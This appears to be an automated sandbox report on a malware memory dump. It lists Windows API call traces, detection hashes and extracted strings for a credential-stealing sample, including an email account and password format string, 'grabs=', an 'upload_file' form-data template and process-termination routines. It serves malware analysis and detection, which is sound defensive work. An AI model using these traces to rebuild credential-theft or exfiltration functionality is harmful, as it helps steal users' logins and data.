  • Part of subcall function 0045315A: lstrlen.KERNEL32(?,00000104,?,00000000,004657EA,142E03F5,?), ref: 00453165
  • Part of subcall function 0045315A: lstrcpy.KERNEL32(00000000,?), ref: 00453181
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$lstrcpy
• String ID: IMAP$POP3$SMTP$_iF$type=%S, name=%S, address=%S, server=%S, port=%u, ssl=%S, user=%S, password=%S
• API String ID: 805584807-4214221636
• Opcode ID: c8b89e2bb908993b5ec8c6f7db05018e188c0747291045dce2612d51724644b0
• Instruction ID: 4d4579715b798e7d3e667f09621c3100dd20c8cd23707a8947be4c6655af939f
• Opcode Fuzzy Hash: c8b89e2bb908993b5ec8c6f7db05018e188c0747291045dce2612d51724644b0
• Instruction Fuzzy Hash: 76712871900519EBCF21DFA5C8859EFBBB8FF08705F10456AF905A7201E7389A51CF9A
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0044B053: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,00000000,?,00441A29,?), ref: 0044B064
  • Part of subcall function 0044B053: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00441A29,?), ref: 0044B081
• lstrlenW.KERNEL32(00000000,00000000,75D706E0,00000020,00750025,80000001), ref: 00463CBC
• lstrlenW.KERNEL32(00000008), ref: 00463CC3
• lstrlenW.KERNEL32(?,?), ref: 00463CDF
• lstrlen.KERNEL32 ref: 00463D59
• lstrlenW.KERNEL32(?), ref: 00463D65
• wsprintfA.USER32 ref: 00463D93
  • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
• String ID: _iF
• API String ID: 3384896299-3005318356
• Opcode ID: acf9707acdbf39e0c72ec3dcfb32ea25dcf996a548386a3ce5763d15581d3095
• Instruction ID: 90a8fb1493db96dca3283d121a456eaa76a17d2d58eb5cf33e00fa4b2f067fd1
• Opcode Fuzzy Hash: acf9707acdbf39e0c72ec3dcfb32ea25dcf996a548386a3ce5763d15581d3095
• Instruction Fuzzy Hash: 0D417FB1900109AFDB01EFA6CC45DAE7BF9FF44304B04446AF80597222EBB5EA14CF69
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(00000000,?), ref: 00451253
• lstrlen.KERNEL32(?,?), ref: 00451271
• RtlAllocateHeap.NTDLL(00000000,74B06985,?), ref: 0045129A
• memcpy.NTDLL(00000000,00000000,00000000), ref: 004512B1
• HeapFree.KERNEL32(00000000,00000000), ref: 004512C4
• memcpy.NTDLL(00000000,?,?), ref: 004512D3
• HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 00451337
  • Part of subcall function 00453C8D: RtlLeaveCriticalSection.NTDLL(?), ref: 00453D0A
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
• String ID:
• API String ID: 1635816815-0
• Opcode ID: 52487bd10cb58ab5438131c2a93319fd61e7090b6a7b4c062d1946e1acf114e2
• Instruction ID: d85a823f37de3cf2f5bcaf862b2075a5dc5a88c13d4dfac5b5476d836d8fe07b
• Opcode Fuzzy Hash: 52487bd10cb58ab5438131c2a93319fd61e7090b6a7b4c062d1946e1acf114e2
• Instruction Fuzzy Hash: 5B41D031900208BBDB219FA5CC84B9E7BB4EF04356F01456AFC04A6272D7789E58DB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32 ref: 00450E2B
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• GetLastError.KERNEL32 ref: 00450D9F
• WaitForSingleObject.KERNEL32(00000000), ref: 00450DAF
• GetLastError.KERNEL32 ref: 00450DCF
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ErrorLast$AllocateHeapObjectSingleWait
• String ID: mF$ImF
• API String ID: 35602742-2157277370
• Opcode ID: 413fd9fb0df96b92f60ef2f570843de89c7b72ccaae2725c418a9eccc43f3cd3
• Instruction ID: 431086f0b9563cf72e97b39c1f2441985f9bb0aa468bab17e077428de9f4085c
• Opcode Fuzzy Hash: 413fd9fb0df96b92f60ef2f570843de89c7b72ccaae2725c418a9eccc43f3cd3
• Instruction Fuzzy Hash: 7141FE74D00209EFDF10DFD5C9855AEBBB5FB04346F20486AE901E6252E7749E48DB16
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: 8jF$Email$\gF$hnF
• API String ID: 1279760036-2714262774
• Opcode ID: 351ef8ef3fb38926f5ed7a7cf1d221fb54b8f17fcb1c6802bd9f3b0d43c694a7
• Instruction ID: 47eeff6bf8ce04a0f0079222b2383556a718372ac788ec0e85ce787d08dde75f
• Opcode Fuzzy Hash: 351ef8ef3fb38926f5ed7a7cf1d221fb54b8f17fcb1c6802bd9f3b0d43c694a7
• Instruction Fuzzy Hash: 6931ADB1508209BFEB119F51CC84E6BBFADFB84398F00092EFA8590061D735DD55DB66
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0045F156
• lstrcpy.KERNEL32(00000000,grabs=), ref: 0045F168
• lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0045F175
• lstrlen.KERNEL32(grabs=,?,?,?,?,?,00000000,00000000,?), ref: 0045F187
• HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0045F1B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
• String ID: grabs=
• API String ID: 2734445380-3012740322
• Opcode ID: 769b42fdb1b5997343b35c74bda37f8b4ee7d2e1dd3ad48b3b7fefc5035783f5
• Instruction ID: 114a41e1193346b230e7e9441dd145acb9a734ed905435291776d0caff07489c
• Opcode Fuzzy Hash: 769b42fdb1b5997343b35c74bda37f8b4ee7d2e1dd3ad48b3b7fefc5035783f5
• Instruction Fuzzy Hash: 95317C32900208FFCB119F95DC49EDF7BB9EF44321F04452AFD0492212EB789959CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045D8E5: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0045B50C,?,?,00000000), ref: 0045D8F1
                                                                                                                                          • Part of subcall function 0045D8E5: _aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 0045D907
                                                                                                                                          • Part of subcall function 0045D8E5: _snwprintf.NTDLL ref: 0045D92C
                                                                                                                                          • Part of subcall function 0045D8E5: CreateFileMappingW.KERNEL32(000000FF,0046E0F8,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 0045D948
                                                                                                                                          • Part of subcall function 0045D8E5: GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0045B50C,?), ref: 0045D95A
                                                                                                                                          • Part of subcall function 0045D8E5: CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,0045B50C), ref: 0045D992
                                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?,00000000), ref: 0045B52B
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0045B534
                                                                                                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0045B554
                                                                                                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 0045B57A
                                                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81,?), ref: 0045B5B3
                                                                                                                                        • GetLastError.KERNEL32(Function_000068FB,00000000,00000000), ref: 0045B5E2
                                                                                                                                        • CloseHandle.KERNEL32(00000000,Function_000068FB,00000000,00000000), ref: 0045B5F2
                                                                                                                                          • Part of subcall function 00450CB4: lstrlenW.KERNEL32(?,00000000,00000000,74B05520,?,?,004424EC,?), ref: 00450CC0
                                                                                                                                          • Part of subcall function 00450CB4: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,004424EC,?), ref: 00450CE8
                                                                                                                                          • Part of subcall function 00450CB4: memset.NTDLL ref: 00450CFA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wow64$CloseFileHandle$EnableErrorLastRedirectionTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3181697882-0
                                                                                                                                        • Opcode ID: 4683a318e0621a4254b9c148ed0bdaa668d16ebfb001cd7b65dbb77d0319db60
                                                                                                                                        • Instruction ID: e32728766affc92901fbfe90c41f70fa87c4c6964acae302b9dc92571cc6a109
                                                                                                                                        • Opcode Fuzzy Hash: 4683a318e0621a4254b9c148ed0bdaa668d16ebfb001cd7b65dbb77d0319db60
                                                                                                                                        • Instruction Fuzzy Hash: AD312B35900318FBEB049B62CC447AE77B4EF4131AF10446BEC41D2151FB789D499B9E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,74B05520,?,?,?,00441568,0000010D,00000000,00000000), ref: 00442550
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00442566
                                                                                                                                        • memcpy.NTDLL(00000010,?,00000000,?,?,?,00441568,0000010D), ref: 0044259C
                                                                                                                                        • memcpy.NTDLL(00000010,00000000,00441568,?,?,?,00441568), ref: 004425B7
                                                                                                                                        • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 004425D5
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00441568), ref: 004425DF
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,00441568), ref: 00442605
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2237239663-0
                                                                                                                                        • Opcode ID: e5699d52882f3c26147c09e9bee7a792ef8c3972c74e5905a7d581e473a583a2
                                                                                                                                        • Instruction ID: dc613bce9f3c2492495d21df67fa975f74efe899c2ddfdf8370191bc83d7bd3f
                                                                                                                                        • Opcode Fuzzy Hash: e5699d52882f3c26147c09e9bee7a792ef8c3972c74e5905a7d581e473a583a2
                                                                                                                                        • Instruction Fuzzy Hash: 4831AE36900209FFDB20CFA5DD44A9B7BB8FB04350F04483AFD09D2250E6B49A59DBA6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044B4D8: RtlEnterCriticalSection.NTDLL(0046E268), ref: 0044B4E0
                                                                                                                                          • Part of subcall function 0044B4D8: RtlLeaveCriticalSection.NTDLL(0046E268), ref: 0044B4F5
                                                                                                                                          • Part of subcall function 0044B4D8: InterlockedIncrement.KERNEL32(0000001C), ref: 0044B50E
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,Blocked), ref: 004433CE
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 004433DF
                                                                                                                                        • lstrcmpi.KERNEL32(00000002,?), ref: 00443425
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 00443439
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,Blocked), ref: 00443478
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                                                                                                                        • String ID: Blocked
                                                                                                                                        • API String ID: 733514052-367579676
                                                                                                                                        • Opcode ID: 9c0ca157d4cda38371bf31050ce22e3bfa48810cb022af084495d64a01a0280a
                                                                                                                                        • Instruction ID: d2d03b4ba69ada8a367b27817f4d3e2280572cc185dc87fe444be1b37bfcb3b8
                                                                                                                                        • Opcode Fuzzy Hash: 9c0ca157d4cda38371bf31050ce22e3bfa48810cb022af084495d64a01a0280a
                                                                                                                                        • Instruction Fuzzy Hash: C021E771900214BFEB109FA5CC85A9F7B78FF04755F14403AFD05A2251EB798E44CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 00447C4A
                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00447C5A
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • strcpy.NTDLL ref: 00447C71
                                                                                                                                        • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 00447C7B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeaplstrlenmemsetstrcpy
                                                                                                                                        • String ID: pgF$kF
                                                                                                                                        • API String ID: 528014985-1288129778
                                                                                                                                        • Opcode ID: 3e80a8b82dac4b5007aa4e1ec206c7b36d59692596b03e8fcc4199020777b1f5
                                                                                                                                        • Instruction ID: 799d3716e9337a747f2789126a57a2213d5b9b3b0ee47675f727040bf33110f3
                                                                                                                                        • Opcode Fuzzy Hash: 3e80a8b82dac4b5007aa4e1ec206c7b36d59692596b03e8fcc4199020777b1f5
                                                                                                                                        • Instruction Fuzzy Hash: 1821B071604301AFE720AF25DC89B2B77F8EF44315F10882AF85682291FBB8D845C71A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000001,77E2EB70), ref: 00443BC4
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • wsprintfA.USER32 ref: 00443BEE
                                                                                                                                          • Part of subcall function 0045B80F: GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0045E03B), ref: 0045B825
                                                                                                                                          • Part of subcall function 0045B80F: wsprintfA.USER32 ref: 0045B84D
                                                                                                                                          • Part of subcall function 0045B80F: lstrlen.KERNEL32(?), ref: 0045B85C
                                                                                                                                          • Part of subcall function 0045B80F: wsprintfA.USER32 ref: 0045B89C
                                                                                                                                          • Part of subcall function 0045B80F: wsprintfA.USER32 ref: 0045B8D1
                                                                                                                                          • Part of subcall function 0045B80F: memcpy.NTDLL(00000000,?,?), ref: 0045B8DE
                                                                                                                                          • Part of subcall function 0045B80F: memcpy.NTDLL(00000008,004683E4,00000002,00000000,?,?), ref: 0045B8F3
                                                                                                                                          • Part of subcall function 0045B80F: wsprintfA.USER32 ref: 0045B916
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00443C63
                                                                                                                                          • Part of subcall function 00465BFE: RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 00465C14
                                                                                                                                          • Part of subcall function 00465BFE: RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 00465C2F
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 00443C4B
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00443C57
                                                                                                                                        Strings
                                                                                                                                        • Content-Type: application/octet-stream, xrefs: 00443BE0
                                                                                                                                        • Content-Disposition: form-data; name="upload_file"; filename="%s", xrefs: 00443BE8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                                                                                                                        • String ID: Content-Disposition: form-data; name="upload_file"; filename="%s"$Content-Type: application/octet-stream
                                                                                                                                        • API String ID: 3553201432-2405033784
                                                                                                                                        • Opcode ID: bc1bd36d4b4402e86172d95323f6c3d29b9f81215fee715c02dd64be938ff90d
                                                                                                                                        • Instruction ID: e19f60b7d2778cf6d7efbb40d1c1e7d9e676811eac8c71a7392b2b0ac0d901e3
                                                                                                                                        • Opcode Fuzzy Hash: bc1bd36d4b4402e86172d95323f6c3d29b9f81215fee715c02dd64be938ff90d
                                                                                                                                        • Instruction Fuzzy Hash: 63214876800249BBCF119F96DC44DCFBFB9FF58700F000426F915A2121E7B58A24DBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,74B05520,?,00000000,?,?,0046331D,?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0044BD92
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                          • Part of subcall function 0044B764: memset.NTDLL ref: 0044B76C
                                                                                                                                          • Part of subcall function 0045383E: lstrlen.KERNEL32(74B05520,00000008,?,00000000,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000,?,?,0045F5E5), ref: 0045384A
                                                                                                                                          • Part of subcall function 0045383E: memcpy.NTDLL(00000000,74B05520,74B05520,74B05520,00000001,00000001,?,?,0044DA9C,74B05520,74B05520,00000000,00000008,0000EA60,00000000), ref: 004538A8
                                                                                                                                          • Part of subcall function 0045383E: lstrcpy.KERNEL32(00000000,00000000), ref: 004538B8
                                                                                                                                        • lstrcpy.KERNEL32(00000038,?), ref: 0044BDCD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpylstrlen$AllocateHeapmemcpymemset
                                                                                                                                        • String ID: Accept-Encoding:$Connection:$GET$Host:$User-Agent:
                                                                                                                                        • API String ID: 3405161297-3467890120
                                                                                                                                        • Opcode ID: 96ce9a0220d874d1a92843c252b74d989721d5a0e389ad170927cac0adee6872
                                                                                                                                        • Instruction ID: b4fb6f31b0e849be66bb948fdd3d7ee324c9bde6221610bd0ea0b2e970282aa8
                                                                                                                                        • Opcode Fuzzy Hash: 96ce9a0220d874d1a92843c252b74d989721d5a0e389ad170927cac0adee6872
                                                                                                                                        • Instruction Fuzzy Hash: 5C11C8716002047B9B107FB7DC86E9F7AACEF80359710002BF901D2202EF7CE94596AE
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
  • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
  • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
  • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
  • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,0045B446,?), ref: 00457D3D
• HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,0045B446,?,00000000,?,00000000,?,?), ref: 00457DB0
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
• String ID:
• API String ID: 2078930461-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNEL32(?,00000004,00000040,?,?,?), ref: 00446217
• VirtualProtect.KERNEL32(?,00000004,?,?,?,?), ref: 00446247
• RtlEnterCriticalSection.NTDLL(0046E240), ref: 00446256
• RtlLeaveCriticalSection.NTDLL(0046E240), ref: 00446274
• GetLastError.KERNEL32(?,?), ref: 00446284
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
• String ID: 8F
• API String ID: 653387826-3652835401
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00452AD7: lstrlen.KERNEL32(00000000,00000000,77E2EEF0,77E2EB70,?,?,?,004599BE,253D7325,74B481D0,77E2EEF0,77E2EB70,?,?,00444403,?), ref: 00452B3E
  • Part of subcall function 00452AD7: sprintf.NTDLL ref: 00452B5F
• lstrlen.KERNEL32(00000000,253D7325,74B481D0,77E2EEF0,77E2EB70,?,?,00444403,?,03BD8D60), ref: 004599CF
• lstrlen.KERNEL32(?,?,?,00444403,?,03BD8D60), ref: 004599D7
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• strcpy.NTDLL ref: 004599EE
• lstrcat.KERNEL32(00000000,?), ref: 004599F9
  • Part of subcall function 004636CC: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00459A08,00000000,?,?,?,00444403,?,03BD8D60), ref: 004636E3
  • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
• StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00444403,?,03BD8D60), ref: 00459A16
  • Part of subcall function 0044288E: lstrlen.KERNEL32(?), ref: 00442898
  • Part of subcall function 0044288E: _snprintf.NTDLL ref: 004428F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
• String ID: =
• API String ID: 2864389247-1428090586
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0044B633
• wcstombs.NTDLL ref: 0044B644
  • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADD1
  • Part of subcall function 0045ADBF: StrChrA.SHLWAPI(?,00000020,?,00000000,00443227,00000000,00000001,?,?,?,Kill,?,?), ref: 0045ADE0
• OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0044B665
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0044B674
• CloseHandle.KERNEL32(00000000), ref: 0044B67B
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0044B68A
• WaitForSingleObject.KERNEL32(00000000), ref: 0044B69A
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
• String ID:
• API String ID: 417118235-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(?,00000000,00466A4C,74B05520,0045D37E,?,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 0044791D
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• lstrcpy.KERNEL32(00000000,?), ref: 00447941
• StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 00447948
• lstrcpy.KERNEL32(00000000,4C003436), ref: 00447990
• lstrcat.KERNEL32(00000000,00000001), ref: 0044799F
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrcpy$AllocateHeaplstrcatlstrlen
• String ID: 7gF
• API String ID: 2616531654-1801860034
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
  • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
  • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
  • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
  • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
• lstrcpy.KERNEL32(-000000FC,00000000), ref: 00447B77
• CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00002365), ref: 00447B89
• GetTickCount.KERNEL32 ref: 00447B94
• GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,?,00002365), ref: 00447BA0
• lstrcpy.KERNEL32(00000000), ref: 00447BBA
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
• String ID: \Low
• API String ID: 1629304206-4112222293
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004536DA: lstrlen.KERNEL32(?,00000000,?,00000000,00464D5C,?,004683E7,00000000,?,?,0045476E,004683E7,?,?,004683E7), ref: 004536E6
• RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00450C35
• memcpy.NTDLL(00000000,?,?), ref: 00450C48
• RtlEnterCriticalSection.NTDLL(0046E268), ref: 00450C59
• RtlLeaveCriticalSection.NTDLL(0046E268), ref: 00450C6E
• HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00450CA6
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
• String ID: `F
• API String ID: 2349942465-3520748611
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 0046187A
  • Part of subcall function 0044966C: wcstombs.NTDLL ref: 0044972A
• lstrlen.KERNEL32(?,?,?,?,?,00449FB2,?,?), ref: 0046189D
• lstrlen.KERNEL32(?,?,?,?,00449FB2,?,?), ref: 004618A7
• memcpy.NTDLL(?,?,00004000,?,?,00449FB2,?,?), ref: 004618B8
• HeapFree.KERNEL32(00000000,?,?,?,?,00449FB2,?,?), ref: 004618DA
Strings
• Access-Control-Allow-Origin:, xrefs: 00461868
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heaplstrlen$AllocateFreememcpywcstombs
• String ID: Access-Control-Allow-Origin:
• API String ID: 1256246205-3194369251

APIs
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• RtlInitializeCriticalSection.NTDLL(0046E240), ref: 00442364
• RtlInitializeCriticalSection.NTDLL(0046E220), ref: 0044237A
• GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044238B
• GetModuleHandleA.KERNEL32(0046F01D), ref: 004423B8
  • Part of subcall function 00450B1C: GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,77E49EB0,00000000,?,?,?,?,00000000,004423A2), ref: 00450B2D
